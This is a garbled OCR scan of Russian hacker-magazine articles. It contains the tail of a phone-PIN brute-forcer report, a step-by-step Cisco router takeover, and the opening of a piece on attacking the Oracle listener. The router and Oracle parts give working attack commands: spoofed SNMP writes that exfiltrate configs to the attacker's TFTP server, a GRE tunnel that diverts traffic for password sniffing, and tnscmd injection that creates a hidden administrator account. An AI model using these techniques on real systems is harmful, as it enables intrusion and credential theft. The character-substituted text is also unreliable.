
Визуализация двух массивов данных, полученных после обработки 
ѴѴАѴ- файл о в 



ошибкой. Чем больше ошибка, тем меньше схожесть файлов. Для при- 
нятия решения о совпадении эталона и записи указываем пороговое 
значение ошибки. Оценка производится очень просто: рассчитываю в 
процентах, насколько каждый байт эталона отличается от соответствую- 
щего записанного байта, и нахожу среднее значение процента ошибки. 
Но если оценивать оба файла напрямую, то даже для представленного 
примера ошибка будет очень большой. Поэтому, перед тем как произво- 
дить оценку, я подготавливаю оба файла, то есть делаю нормализацию 
(масштабирую по высоте), обрезаю паузы в начале и конце каждого 
файла, затем осуществляю аппроксимацию и сжатие до 100 значений, 

В результате получаю два массива данных по 100 значений (смотри 
рисунок), которые необходимо сравнить. Для показанного примера 
ошибка составляет 25%, но не стоитзабывать, что это относительное 
значение, поэтому его надо сравнить с пороговым значением ошибки. А 
вот пороговое значение я определял экспериментально. 

В БРУТФОРСЕР 

Для программной реализации самого брутфорсера мне понадобилось 
следующее: динамическая библиотека 5куре4С0М.сІІІ, класс для ра- 
боты с ѴѴАѴ- файл ом, математический класс для выполнения нормали- 
зации и аппроксимации, а также компонент для визуализации данных 
(когда подбирал пороговое значение ошибки). Кое-что из этого я 
нашел в интернете, а кое-что пришлось выдрать из готовых программ 
(спасибо мел ко мягким за создание .МЕТ). Программа состоит из трех 
основных закладок: 

1) «Анализ» — отображает процесс работы брутфорсера; 

2 ) «Настройки» — все основные настройки; 

3) «Сравнение» — оценка двух произвольных ШѴѴ-файлов . 

Самое важное в процессе работы брутфорсера — это четкая синхрони- 
зация с «железной теткой». Это необходимо, чтобы записать именно 
результат аутентификации, а не прощальную фразу. Чтобы достичь нуж- 
ного результата, надо сделать как можно больше временных настроек 
и за пастись терпением, чтобы подобрать оптимальные значения. По- 
этому в настройках брутфорсера я описал весь алгоритм одного опроса 
(смотри рисунок), что позволяет настраивать временные интервалы 
каждого этапа опроса. 

В ВЫВОДЫ 

Ну и немного о результатах практического применения брутфорсера. 

В результате всех действий мне удалось сократить время, затрачи- 
ваемое на обработку одного варианта, до 30 сек., и недельная работа 
брутфорсера принесла 12логиновс ПИН-кодами и немалый счет за 
телефонные звонки по Экуре (никто не говорил, что это бесплатно). 

Но в моем случае шкурка стоила выделки, поскольку в конечном итоге 
вернулась в двадцати кратно большем размере (но это уже совсем 
другая история). 

Я думаю, что при желании ты найдешь другой способ создания брутфорсе- 
ра, а может, и сам метод взлома, но не забывай, что цель должна оправды- 
вать средства :). И-Е 
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Укрощение дикой 
кискИр или сливаем 
пароли чемоданами 



Сегодня маршрутизаторы фирмы Сі$со Зувіетз — это железная основа сети Интернет. 
Их стабильное функционирование является залогом работоспособности глобальной 
сети, и потому любая критическая ошибка в их прошивке может поставить под угрозу 
нормальную работу и связность особо важных сегментов интернета. Сейчас я расска- 
жу о нескольких уязвимостях железной кошки, о которых ты просто обязан знать. 
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Н «БОЧКИ», ИЛИ ВЗЛОМ МАРШРУТИЗАТОРА ПО 5ЫМР 

Ксчастью (а может, ксожалению), в последнее время критических ошибок 
в операционной системе 105 стали находить все меньше, но количество 
багов в голове сетевыхадминистраторов от этого не сокращается. На 
просторах Дикого-дикого Веба все еще можно встретить роутеры, доступ к 
которым осуществляется посредством Теіпеі и маршрутизаторы 5ИМР- 
сопттшпііу с именами риЫіс или ргіѵаіе. Если использование для доступа к 
терминалу протокола Теіпеі — это еще половина беды, то применение про- 
стых и часто встречающихся имен 5ММР-соттипііу (да еще и бездолжной 
фильтрации) — это вообще полный белый пушистый зверек. ЗИМР-сервер 
маршрутизатора как раз и будет нашей главной целью атаки, вариантов 
которой может быть несколько. 

Первый вариант открыт для нас, если доступ к 5ЫМР-а генту атакуемого мар- 
шрутизатора фильтруется плохо или не фильтруется вообще. В таком случае 
достаточно использовать перебор соттипііу-строк по словарю или брутфор- 
сом. Ксчастью (или опять же ксожалению), 5ЫМР-сервер не имеетпонятия 
отом, что такое количество попыток и их лимит, потому перебор можно 
осуществлять сплошным потоком, используя различныеутилиты. Конечно, 
лучше, если это будет самописный скрипт, но использование готового софта 
тоже вполне приемлемо. Например, можно за юзать тулзы из состава Зоіаг 
ѴѴІпсІ Епдіпеегз Тооівеі 9.0 — комплекта приложений для сетевых инженеров, 
в состав которого входят утилиты для брутфорсинга строкЗЫМР-соттипііу и 
атаки по словарю. Утилиту очень просто найти в пиринговых сетях, надеюсь, 
это не составит больших проблем (длятех, кто втанке: мы выложили эту 
утилиту на наш 0Ѵ0). 

Второй вариант доступен нам, если ЗЫМР-соттипііу задана распростра- 
ненной (а значит, легко подбираемой) строкой, но доступ кЗЫМР-агенту 
надежно фильтруется в списках правил. Этот вариант мы рассмотрим под- 
робнее, так какой представляет больший интерес и сложность в сравнении 
с первым. Конечно, здесь может иметь место еще более сложный вариант, 
состоящий из комбинации первого и второго способа, о котором мы еще 
поговорим. 

Итак, все же вернемся ко второму варианту. В качестве плацдарма для ата- 
ки будем использовать компьютер под управлением ОС Ыпих (в моем слу- 
чае это бепіоо Ыпих 2007.0 с ядром 2.6.23). Для реализации атаки требуется 
наличие пакета пеі-зпппр и іріаЫез (я использовал версии пакетов 5.4 и 
1 .3.8 соответственно). Помимо всего прочего, в ядре должна быть включена 
полнаятрансляция сетевых адресов и отслеживание соединений в виде 
модулей іріаЫе_паі, ір_соппігаск и ір_іаЫез или в виде следующих опций в 
ядре, заданных при компиляции: 



ССЖРІС_ЫЕТРІЬТЕК=у 

СОЫРІО_ЫР_СОШТКАСК_ЕЫАВЬЕБ=у 

СОЫРІС_ЫР_СОШТКАСК=у 

СОЫР ІС_ЫР_СОШТКАСК_І РѴ4 =у 

ССЖРІС_ІР_КР_ІРТАВЬЕЗ=у 

ССЖРІС_ЫР_КАТ=у 

ССЖРІС_ЫР_КАТ_ЫЕЕВЕБ=у 

Послеустановки всехтребуемых пакетов и, при необходимости, пересбор- 
ки ядра первым делом нужно добавить правило ІріаЫез, которое будет 
выполнять преобразование сетевых адресов (в нашем случае их подмену). 

В правиле необходимо указать, что адрес источника всех пакетов, направ- 
ляющихся по протоколу II йР к ЗЫМР-агенту маршрутизатора (работающего 
на 161-м ІЮР-порту), надо заменить адресом того хоста, который может 
беспрепятственно использовать 5ЫМР-менеджер для управления и сбора 
статистики (читай: админский адрес). Подобная запись выглядит следую- 
щим образом: 

ірВаЫез -В паВ -А РОЗТКОРТШС -р шір --сЗзВ 10.10.100.200 
--сІрогВ 161 М ЗЫАТ --Во-зоигсе 192.168.0.137 

Здесь сізі' — адрес атакуемого маршрутизатора, '--іо-зоигсе' — адрес 
доверенного хоста, который имеет доступ кЗЫМР-агенту. Для полной 
уверенности в корректности функционированиятакой команды рекомен- 
дую сделать пробный дамп ісрсіиппр’ом и посмотреть адреса назначения. 
Скорее всего, утебя, мой уважаемый читатель, сразу возник вопрос отом, 
как мы будем получать ответы отЗИМР-сервера маршрутизатора (агента). 
Ответ — никак. Нам это и не требуется. Единственный ми нус та кого раскла- 
да — мы не сможем контролировать правильность выполнения команд и 
быть абсолютно уверенным и в том, что мы все делаем правильно: ответы 
будут уходить доверенному адресу, а мы будет получать тайм-ауты запросов, 
однако маршрутизатор при правильно составленныхзапросах покорно 
выполнит все, что от него требуется. На самом деле это очень похоже на то, 
как мы нередко ночью добираемся до холодильника на кухне: хоть глаза 
ничего и не видят, дорогу мы знаем прекрасно и всегда можем найти пункт 
назначения :). Такая покорность маршрутизатора обусловлена, какты 
догадался, принципом работы протокола II йР, ведь соединение по ІЮ Р на 
транспортном уровне неустанавливается, и мы спокойно может передавать 
данные, не беспокоясьза их доставку и не получая уведомления о ней. 
Естественно, как и в любой другой системе, крупная добыча (хотя и не 
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Внимание! Все 
действия взломщика 
противозаконны! 
Информация пред- 
ставлена исключи- 
тельно с целью озна- 
комления! Ни автор, 
ни редакция за твои 
действия ответс- 
твенности не несут! 
Все эксперименты 
по взлому проводи- 
лись исключительно 
на тестовом стенде. 




> ѵісіео 

На ОѴО-диске ты 
найдешь мое видео, 
показывающее про- 
цесс взлома Сізсо 




> СІѴСІ 

На дискеты найдешь 
весь софт, описан- 
ный в статье. 



являющаяся главной целью) — это конфигурационные 
файлы. Операционная система маршрутизаторов Сівсо 105 не 
исключение, здесьэтими конфигурационными файлами могу 
быть гиппіпд-сопбд и віагіир-сопбд, главное отличие которых 
понятно из названия, но разницы между ними в полностью 
настроенном и автономно функционирующем маршрутизато- 
ре чаще всего нет. Этот конфигурационный файл, описываю- 
щий все настройки роутера, и будет нашей главной целью при 
атаке на 5ММР-соттипііу, доступной на запись. Получить 
конфиг можно несколькими способами, ноте из них, которые 
являются автономными, мы рассматривать не будем. По сети 
конфигурационный файл можетбыть получен по протоколам 
РТР, ТРТР или Р5СР. В своем примере я буду использовать 
протокол ТРТР для простоты, в качестве ТЕТРб заюзаем демон 
аШрі (я задействовал версию аікр 0.7, хотя вместо нее с 
таким же успехом под ѴѴІпсІоѵѵв мог бы быть за юза н ТРТР-сер- 
вер из состава ЗоІагѴѴІпсІв Епдіпеегз Тооізеі). Спионеренный 
конфиг будет сохраняться в дефолтной папке іИрсІ — ЛИрЬооТ 
Что дотаблиц5!\ІМР-МІВ, то нас будет интересовать раздел 
СІ5С0-С0Ы РІѲ-СОРУ-М I В, который доступен в Сізсо 105 
начинаяс 12-й ветки, заменив собой устаревшую секцию 
0Ю-СІ5С0-5У5ТЕМ-МІВ. 

Укажем, что для передачи данных используем ТЕТР-протокол: 

зптрзеО -ѵ 1 -с ргіѵаОе «іеѵісе пате> .1.3. 6.1. 

4.1.9.9.96.1.1.1.1.2.666 іпОедег 1 

В качестве целого числа задается протокол 1 для ТРТР, 2 для 
РТР и 3 для Р5СР. Число 666 выбрано случайно и идентифи- 
цирует ячейку, в которую мы записываем нашу составную 
команду для копирования. <сіеѵісе пате> — имя целевого 
маршрутизатора или ІР-адрес. В моем случае это 1 72.22.2.1 . 
Собственно, строка «1 .3.6.1 .4.1 .9.9.96.1 .1 .1 .1 .» — это 
фиксированное значение ОЮ из состава СІ5С0-С0ЫРІѲ- 
С0РУ-М1В, отвечающее за копирование. Затем идет цифра, 
которая отвечаетза составные части «команды копирова- 
ния». Далее укажем, что хотим скопировать текущий исполь- 
зуемый конфигурационный файл — гиппіпд-сопіід: 

зптрзеД -ѵ 1 -с ргіѵаДе «іеѵісе пате> . 1 . 3 . 6 . 1 . 

4.1.9.9.96.1.1.1.1.3.666 іпОедег 4 

Если указать после іпіедег 1 , то 105 будет пытаться копировать 
файл из сети, находящийся, например, на ТРТР; если 2, то 
любой локальный файл, неявляющийся конфигурационным; 

3 (зіа гІи р-сопбід) , 4 (гиппіпд-сопіід); и последний вариант 5 — 



стандартныйтерминальный вывод. Третьей командой указы- 
ваем, что хотим скопировать файл по сети (ссСоруОезіЕІІеТуре 
ІЫТЕ6ЕР: пеіѵѵогкРІІе): 

зптрзеД -ѵ 1 -с ргіѵаке <с!еѵісе паше> . 1 . 3 . 6 . 1 . 

4.1.9.9.96.1.1.1.1.4.666 іпіедег 1 

Варианты целочисленного параметра аналогичны предыду- 
щей команде. Четвертой командой назначим адрес ТЕТР-сер- 
вера: 

зптрзеД -ѵ 1 -с ргіѵаОе <с!еѵісе пате> . 1 . 3 . 6 . 1 . 

4.1.9.9.96.1.1.1.1.5.666 асісігезз <адрес ТРТР- 
сервера> . 

В моем случае это 172.22.1 .18. Далее зададим имя файла на 
ТЕТР-сервере: 

зптрзеД -ѵ 1 -с ргіѵаіе <с!еѵісе паше> . 1 . 3 . 6 . 1 . 

4.1.9.9.96.1.1.1.1.6.666 зДгіпд ѵісОіт-сопіід 

После того как команда составлена, можно запускать процесс 
копирования: 

зптрзеД -ѵ 1 -с ргіѵаіе <с!еѵісе пате> . 1 . 3 . 6 . 1 . 

4.1.9.9.96.1.1.1.1.14.666 іпіедег 1 

Для запуска копирования можноуказать параметр 1 или 4. 
Если бы у нас был доступ, то мы могли бы проверить, успешно 
ли выполнена команда: 

зптрмаік -ѵ 1 -с ргіѵаіе «іеѵісе пате> . 1 . 3 . 6 . 1 
.4.1.9.9.96.1.1.1.1.10.666 

Однако, как и в случае всех других команд, нам будет возвра- 
щен статус: 

ТітеоиД : N 0 Кезропзе ігот «іеѵісе пате>. 

Потому правильность выполнения команды мы будем про- 
верять по наличию в папке ДИрЬоо* файла ѵісбт-сопіід при- 
емлемого размера. Далее можно подчиститьза собой следы 
— удалить ячейку 666 со всеми нашими командами: 

зптрзеД -ѵ 1 -с ргіѵаДе <с!еѵісе пате> . 1 . 3 . 6 . 1 . 
4.1.9.9.96.1.1.1.1.14.666 іпДедег 6 
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Ахда, чуть незабыл: естественно, в качестве сот т и пііу- строки ргіѵаіе 
должно быть имя, заданное на маршрутизаторе. 

Н «АПЕЛЬСИНЫ», 

ИЛИ СЛИВАЕМ ПАРОЛИ ЧЕРЕЗ ОКЕ-ТУННЕЛЬ 

Перейдем к следующему пункту наш их действий — получению терминаль- 
ного доступа к консоли. В скачанном конфиге нас больше всего интересуют, 
какэто ни банально, пароли. Паролей можетбыть несколько в разных 
вариациях: пароль на епаЫе-режим (епаЫе раззѵѵогсі 7 <пароль в виде 
открытого текста > или епаЫе зесгеі 5 <пароль в М05>), пароль на терми- 
нальный доступ: 



Ііпе ѵСу 0 15 

раззѵѵогсі 7 <пароль в виде открытого текста> 

Атакже пароль и имя пользователя (изегпате <имя пользователя> 
раззѵѵогсі 7 <пароль в виде открыто го те кета > или изегпате <имя пользова- 
теля> зесгеі 5 <пароль в М05>). 

Кроме всего вышеназванного, вместо открытого текста в конфигураци- 
онном файле может присутствовать, например, такая строка: «раззѵѵогсі 7 
061 20А3258», где парользакодирован в результате применения команды 
зегѵісе раззѵѵогб-епегурііоп. Здесь 061 20А3258 — не что иное, как пароль, 
отображенный открытым текстом — «Іезі». Подобную кодировку назвать 
шифрованиемтяжело.таккакалгоритм ее кодирования давно известен и 
декодируется, например, утилитой Саіп&АЬеІ, хотя точнотакиеже возмож- 
ности предоставляетЗЗоІагѴѴІпсІ ЕпдіпеегзТооІзеі в утилите Сізсо Роиіег 
Раззѵѵогсі йесгурИоп. 

Возвращаясь к конфигурационному файлу атакуемого маршрутизатора, 
мы без труда найдем строки, отвечающие за конфигурацию паролей, и 
взломаем их перебором или по словарю в Саіп либо просто декодируем 
их. Конечно, если па роль задан в М 05, то придется потратить значи- 
тельное время. Итак, пароль получен! Однако радоваться еще рано, 
ведь доступ к виртуальномутерминалу можетбыть ограничен списком 
доступа, например, так: 



ассезз-ІізС 10 регшіС 172.22.1.7 
ассезз-ІізС 10 сіепу апу 

і 

Ііпе ѵСу 0 4 
ассезз-сіазз 10 іп 
раззѵѵогсі 7 051Е031С35 
Іодіп 



Втаком случае решения можетбыть как минимум два. Первое — попытать- 
ся обойти этот стандартный списокдоступа. Однако трюк, подобный тому, 
что мы провели сЗЫМР, здесь не прокатитпо нескольким причинам. Как 
Теіпеі-, так и 55Н-протоколы используют надежный транспортный прото- 
кол ТОР, который непременнотребуетустановки соединения с помощью 
трехэтапного рукопожатия 5УІ\І<->5УІ\І/АСК<->АСК. Крометого, ответные 
данные получать просто необходимо, иначе соединениетеряетсвой смысл. 
И все же решениеэтой проблемы есть, но доступно оно лишь втом случае, 
если атакующий находится в той же самой подсети, что и адреса, доступ 
которым разрешен потерминалу. Общий смысл сводится либо к простой 
смене адреса на интерфейсе атакующего, либо кспуфингу ІР-адреса и/или 
МАС-адреса. Моей любимой утилитой, реализующей последнее, является 
зТегт от кодера МАО, создателя Саіп&АЬеІ. Скорее всего, разобраться с 
ней тебе не составит труда: все, что требуется сделать, — это задать желае- 
мый ІР-адрес и указать, требуется ли спуфить МАС-адрес источника. 



И все же добраться в нужный сегмент сети чаще всего не представляется 
возможным, поскольку находится он, в отличие от маршрутизаторов, в йМ2 
за корпоративным аппаратным файрволом на основе, например, Сізсо 
РІХ. Конечно, это устройство тоже подвержено некоторым уязвимостям, но 
это повод для отдельной статьи. Итак, допустим, мы находимся за много 
километров и хопов от атакуемого маршрутизатора, и наша конечная цель 
— пачками в благородных целях (для коллекции) собрать пароли пользова- 
телей, трафик которых проходит через тот самый маршрутизатор. 

Тогда мы выберем другую тактику и снова обратимся кЗЫМР. Все, что 
потребуется изменить в предыдущем сценарии, — это поменять местами 
источниккопирования и назначения, предварительно изменив конфигу- 
рационный файл на нашем ТРТР. Этот способ также применим, если нам 
неудалось/нехватило мощности или времени/лениво подобрать пароль. 
Идея нашей атаки заключается в созданиитуннеля между атакующим 
и атакуемым роутером для заворачивания трафика от маршрутизатора 
к атакующему и последующего его возврата на роутер. Если ты знаком с 
базовыми принципами маршрутизации, то должен прекрасно понимать, 
что туннель необходим, чтобы адрес следующего пункта назначения 
находился втой же подсети, что и один из интерфейсов маршрутизатора, 
через который будет проходить тот самый трафик. В нашем случае это будет 
самый распространенный интерфейс-туннель, используемый на Сізсо 
роутерах, — ЭРЕ. 

Открываем любимый текстовый редактор (позор, если это неѵіт или 
етаез) и приступаем к редактированию: 



іпСегіасе ТиппеІО 

ір аскігезз 10.0.0.1 255.255.255.252 
Сиппеі зоигее 172.22.2.1 
Сиппеі (іезСіпаСіоп 172.22.1.18 

і 

іпСегіасе ЕСЪ.егпеСО/0 
ір аскігезз 172.22.2.1 255.255.255.128 
ір роіісу гоиСе-тар зпібб-Ргаббіс 

і 

іпСегіасе ЕСЬегпеСО/1 

ір аскігезз 192.168.0.2 255.255.255.252 
ір роіісу гоике-тар зпібі-Сгаббіс 



ассезз-іізк 101 регтіс Сер апу апу ед СеІпеС 
ассезз-іізк 101 регтіе Сер апу апу ед ССр 
ассезз-іізк 101 регтіс Сер апу ед СеІпеС апу 
ассезз-ІізС 101 регшіС Сер апу ед бСр апу 

гоике-шар зпібб-Сгаббіс регтіР 10 
таСсЪ. ір аскігезз 101 
зек ір пехк-іюр 10.0.0.2 



Первым делом мы создаем новый интерфейс — ТиппеШ. Поумолчанию 
он имееттип ІР/6РЕ. В качестве источника зададим один из адресов 
существующих интерфейсов маршрутизатора, участвующих в процессе 
форвардинга трафика, а в качестве адреса назначения — адрес атакующе- 
го. В моем примере это 1 72.22.1 .18. Далее создаем расширенный список 
доступа, который может фильтровать трафик, в отличие от стандартных 
АСЕ, нетолько по ІР-адресу источника, иукажем, какие протоколы, точнее, 
порты служб, к которым направляется трафик, нас интересуют. Следующим 
шагом будет создание карты маршрута (гоиіе-тар), в которой мы сообща- 
ем, что хотим перенаправлять трафик, соответствующий критериям АСЕ 
101 , на адрес 10.0.0.2, который впоследствии назначимтуннельному интер- 
фейсу на машине атакующего. Ну и, наконец, применим карту маршрутов к 
интерфейсам с помощью политики ІР: 
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взлом 



» 




Общая схема атаки 



В Википедии есть 
неплохая статья о 
БИМР: ги . ѵіі кі ресіі а 
огд/мі кі / 5 N14 Р . 





Мне больше 
понравилась эта: 
щ .БесипЧуТосиз. 
сош/і пТосиБ/1847 : ) . 





> Ипкз 

• ѵѵѵѵѵѵ.охісі.іі — сайт 
кодера МАО, созда- 
теля Саіп&АЬеІ и 
вТегт. 

• ѴѴѴѴѴѴ.СІ5С0.С0ПП 

— незаменимый ис- 
точник информации 
об оборудовании 
Сівсо Зузіетз. 
• ѵѵѵѵѵѵ.зоіагѵѵіпбз.пеі: 

— официальный 
сайт компании 
ЗоІагѴѴІпбз, деве- 
лопера Епдіпеегз 
Тооізеі, исполь- 
зованного мной в 
статье. 

• НеІІкпідЫъ.ѵоісІ.ги 

— сайт Неіі КпідЫіз 
Сгеѵѵ. 

• зЬабозігееѵѵеЬ7.огд 

— моя домашняя 
страница. 



ір роіісу гоиРе-тар зпіРР-РгаРРіс 

Все. Конфигурация готова, можно заливать ее обратно на 
маршрутизатор, какя описал это выше. Теперь перейдем 
к машине атакующего. Для наших целей нам понадобится 
модуль ядра ір_дге. Вот что сообщил тосііпію об этом модуле в 
моей системе: 

Рііепате : /1іЪ/тос1и1ез/2 . 6 . 23-депРоо-гІ/ 
кегпе1/пеР/ірѵ4/ір_дге . ко 
Іісепзе: СРЬ 
сіерепсіз : 

ѵегтадіс: 2 . 6 . 23-депРоо-гІ тос!_іт1оас1 686 
4К8ТАСК8 

Для загрузки модуля ВЫПОЛНИМ: 
тобргоЬе ір_дге 

И проверим успешность его за грузки с помощью команды: 
Ізітюсі I дгер ір_дге 

Если все прошлоуспешно, то самое время приступить к 
установке пакета іргоиіе2 — набора программ для просмотра и 
манипуляции параметрами сетевых устройств, заменившего 
полный набор классическихсетевыхутилит*піх. С помощью 
него мы будем управлять нашим 6РЕ-туннелем и маршрути- 
зацией. Я использовал версию Іргоиіе2-5з07071 0, чего итебе 
советую (на момент написания статьи она была последней). 
Туннельбудетаналогичентому, что мы создали на маршрути- 
заторе, с тем лишь отличием, что адреса источника и назначе- 
ния поменяются местами: 

ір Риппеі асісі ТиппеЮ тосіе дге гетоРе 
172.22.2.1 Іосаі 172.22.1.18 

Далее назначаем адреса туннелю: 

ір асИг асісі 10.0.0.2/30 сіеѵ ТиппеЮ 

И поднимаем линк: 

ір Ііпк зек ТиппеЮ ир 

ір аскіг асісі 10.0.0.2/30 сіеѵ ТиппеЮ 



Так как весьтрафик нам необходимо возвращать на атакуемый 
маршрутизатор, то основным шлюзом будет для нас адрес 
10.0.0.1. Чтобы не потерять связь с адресом 172.22.2.1, пропи- 
шем к нему отдельную маршрутизацию: 

ір гоиРе сіеі сіеіаиІР 

ір гоиРе асісі сіеРаиІР ѵіа 10.0.0.1 

ір гоиРе асісі 172.22.2.0/25 ѵіа 172.22.1.61 

Естественно, чтобы была возможность перенаправлятьтра- 
фик, необходимотакую опцию ВКЛЮЧИТЬ: 

есію '1' > /ргос/зуз/пеР/ірѵ4 /ір_Рогѵ^агсі 

И проверить, всели корректно настроеноу нас в іріаЫез для 
цепочки ЕОРѴѴАРО. Теперь все готово для того, чтобы перена- 
правл ять трафик и вытаскивать из него пароли чемоданами. 

В качестве парольного снифера я использую сізпііі версии 2.4. 
Запустим его: 

сізпіРР -і ТиппеЮ -ѵі . /зпіРРесі_раззѵ\гогсіз 

Через некоторое время файл 5піііесІ_ра55\л/огсІ5 начнетза- 
полняться паролями от ЕТР и Теіпеі-сессий. Прочитать файл 
можнотак: 

сізпіРР -г . /зпіРРесі_раззілгогсіз 

Н ЗЛОКЛЮЧЕНИЕ 

Как говорил Остап Бендер, «грузите апельсины бочка- 
ми». На этом все. Стоит отметить, что подобный сценарий 
уже был описан в статье Маіі АЬагопі, ѴѴІШат М. Нібаідо 
« С і в с о 5ЫМР сопбдигаііоп аиаскѵѵііЬ а6РЕіиппеІ»на 
мѵѵѵѵ.БесигіМосиз.сопп еще в 2005 году. Однако способ, 
приведенный авторами, чрезвычайно неудобен, поскольку 
требует физического доступа к маршрутизатору у атакующе- 
го и имеет предрасположенность к страшным извращениям 
с ісрбитр'ом. Естественно, Диску в ближайшем киоске не 
купишь, да и стоит самая простая модель немалых денег. 

Это первое. А второе — достать жирный канал, который смог 
бы переварить большой объем проходящего трафика, тоже 
будет проблематично. Ну и третье — скрытность. Понятно, 
что анонимный гооі-БЬеІІ скроет следы атакующего, да и 
достать его очень просто (но не в соседнем киоске :)). Всего 
наилучшего, цц 



► 070 



ХАКЕР 01 /109/ 08 





■ЗяЗ 



КАМЕРА 



цф1 іхл ЙМИ.Ч* 



ІѴТГніиЧі 



2Л1МЛЫ 






5Н2КЕВВ 



ВЗЛОМ 



ЗВЕРСКИЕ 
ОПЫТЫ 



ОКАСІ.Е 



шализ защищенности корпоративных сетей все чаще показывает, что уровень обес- 
Іпечения безопасности заметно возрос: администраторы своевременно устанавливают | 



■системные обновления, стандартные пароли на активное сетевое обот 



іаются все реже, сети сегментируют и 



/дованиевсті 



■многих системах соблюдается 

” т 

■не уделяется должного внимания 

: 

управления базами данных, в частности 



, мы сегодня и поговорим.) 



аничивают доступ, парольная политика во 
днако еще имеет место ряд проблем, которым до сих пот 



дна из них — это защищенность корпоративных сис-| 

лш 

гасіе. У безопасности использования этой I 



□ гасіе — одна из самых распространенных СУБД, использу- 
емых в корпоративных системах. Поскольку тема безопас- 
ности 0 га сіе довольно обширна, была собрана небольшая 
статистика наиболее распространенных версий СУБД 
Огасіе в корпоративных сетях. Как оказалось, версия Огасіе БаіаЬазе 
9І до сих пор самая актуальная (68%), несмотря на то что 1 0д (20%) 
вышла уже давно, а недавно выпустили и 11-юверсию. Что касается 
операционных систем, то Огасіе обычно устанавливается на серверы 
под управлением ѴѴІпбоѵѵз (41 %) и Ыпих (32%), реже — на НР-ІІХ (19%) 
и прочих операционках. Следовательно, сосредоточим внимание на 
Огасіе 9 і , а также на версии 1 0д, которая уже в ближайшее время долж- 
на ее полностью заменить. 

В ЛОМАЕМ ОРАСЬЕ СНАРУЖИ 

Удаленный доступ к базе данных предоставляетсервис ОгасІеТЫБ Бізіепег 
(по умолчанию порт 1 521 ). Листенер принимает клиентские запросы на 
соединение и направляет их для обработки в соответствующий сервер- 
ный процесс. Обычно Листенер рассматривается как первый этап на пути 
вторжения в базы данных. Плохо сконфигурированный незащищенный 



Листенер подвержен различным атакам, включая удаленное выполнение 
команд и отказ в обслуживании. В версии Огасіе ниже 1 0д поумолчанию 
возможно осуществление анонимного подключения и, какследствие, 
удаленное управление сервисом. 

В дефолной конфигурации злоумышленник может: 

1) получить детальную информацию об атакуемой системе, както: 

— имена баз данных (5Юз), 

— версия СУБД, 

— пути к Іод-файлам, 

— операционная система, на которой установлена СУБД; 

2) произвести БоБ-атаку; 

3) выполнятьБОБ-команды от имени й ВА; 

4 ) получитьудаленный доступ ксистеме. 

Для подключения кЛ истенеру применяется стандартная утилита ІзпгсЛ, 
входящая в набортулз, устанавливаемых с клиентом для СУБД Огасіе. Для 
получения информации используется команда зіаіиз. 

БоБ-атака может быть осуществлена с помощью утилиты ІзпгсіБ Командой 
зіорудаленный неавторизированный пользователь может остановить ТЫ5 
Бізіепег. 
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С : \1зпгсБІ 
Ь8ШСТЬ> зБор 

СоппесБіпд До (БЕЗСКІРТІОЫ= (АББКЕ83= (РКОТОСОЕ=ІРС) (КЕУ 
=ЕХТРКОС) ) ) 

ТЪ.е соттапсі сотрІеБесІ зиссеззБиІІу 
ЬЗЖСТІ,> зБаБиз 

СоппесБіпд До (БЕЗСКІРТІСЖ= (АББКЕ83= ( РКОТОСОЬ=ТСР) (КЕУ 
=ЕХТРКОС) ) ) 

ТЫ5-12541: ТЫЗ : по ІізБепег 
ТЫЗ-12560: ТЫЗ:ргоБосо1 асІарБег еггог 

Для получения удаленного доступа к системе используется скрипт 
іп5стсІ2.р[ [ ѵѵѵѵѵѵ.]апптесІ.сот/~]ѵѵа/Ьаск5/5есигіІ:ѵ/і:п5СппсІ ]. позволяющий 
Листенеру выполнять команды и генерировать произвольные пакеты. С 
помощью команды веі 1од_Я1е удаленный неавторизированный пользова- 
тель может изменить файл для хранения логов, например, на исполняемый 
файл, лежащий в папке автозагрузки пользователя. Далее с помощью 
утилиты ІпвстсІ2.рІ мы можем послатьзапрос, содержащий системные ко- 
манды, который в результате сохранится в Іод-файле. Атот, в свою очередь, 
запустится при входе пользователя в систему. Для примера рассмотрим 
получение прав на ѴѴІпсІоѵѵБ-сервере. 

[гооБ@зегѵег ] # . /Бпзспкі2 . рі -Ъ. 192.168.30.13 --гамстсі 
" (БЕ8СКІРТІ(Ж= ( С01ШЕСТ_БАТА= (СІБ= (РКОСКАМ=) (НОЗТ=) 
(БЗЕК=)) (СОММАББ=1од_БІ1е) (АКСБМЕБТЗ=4 ) (8ЕКѴІСЕ=БІ 
ЗТЕБЕК) (ѴЕКЗІ(Ж=1) ( ѴАШЕ=С : \БосшпепБз апсі 8еББіпдз\ 
А<5тіпізБгаБог\ЗБагБ Мепи\Ргодгатз\8БагБир\1 . ЪаБ ) ) ) " 

[гооБ@зегѵег ] # . /Бпзсшсі2 . рі -Ъ. 192.168.30.13 --газете! 

" (БЕЗСКІРТІОЫ= ( СО№ІЕСТ_БАТА= ( ( 

> пеБ изег пем_Ас1тіп ЬОскЗг /асісі 

> пеБ Іосаідгоир АсІтіпізБгаБогз пеѵ\г_А<5тіп /асісі 

> " 

В результате этих действий на сервере в папке административной автоза- 
грузки таинственным образом появляется файл, создающий нового локаль- 
ного администратора с известным злоумышленнику паролем. Тем самым 
мы получаем административный доступ ксерверу. 

Для защиты ТЫ5 Бівіепег существует несколько параметров, которыетем 
или иным образом повышаютего безопасность. 

1. РА55ѴѴ0Н0. Если па роль установлен, то неавторизированный злоумыш- 
ленниксможет выполнять только команды зіаіиз и ѵегвіоп, что совсем 
небезопасно. 

2. АО М I Ы_РЕ5ТР I СТІ О N5 — этот параметр во включенном состоянии за- 
прещаетлюбыеудаленные изменения конфигурационного файла. 

3. І_0САІ__05_А11ТНЕІ\ІТІСАТІ0М — этот параметр во включенном состоянии 
позвол яет уп ра вл ять Л истенером только локально. Удален но возможно 



только выполнение команды ѵегвіоп, которая выдаст нам версию установ- 
ленной СУБД и операционной системы. 

Таккаксточкизренияуправления крупной системы предпочтительнее 
иметь возможность удаленного администрирован ия Л истенера, многие 
администраторы отключают Ю САЕ_05_АІІТН ЕЫТІ САТІ О N , но не устанав- 
ливают пароль, что делает 0 гасіе 10Ѳ таким же уязвимым, каки 9і. 

0 ПОДКЛЮЧЕНИЕ К СУБД 

Для подключения кСУБД кроме имени и пароля необходимо знать имя базы 
данных (5Ю]. Незащищенный Листенер поумолчанию выдаетимена баз 
данных без аутентификации. Достаточно воспользоваться утилитой ІвпісЛ 
с опцией вегѵісев. 

Б8ЖСТБ> зегѵісез 

СоппесБіпд До (БЕЗСКІРТІ(Ж= (АББКЕ88= (РЕОТОСОЬ=ІРС) (КЕУ 
=ЕХТРКОС) ) ) 

Зегѵісез Зишшагу. . . 

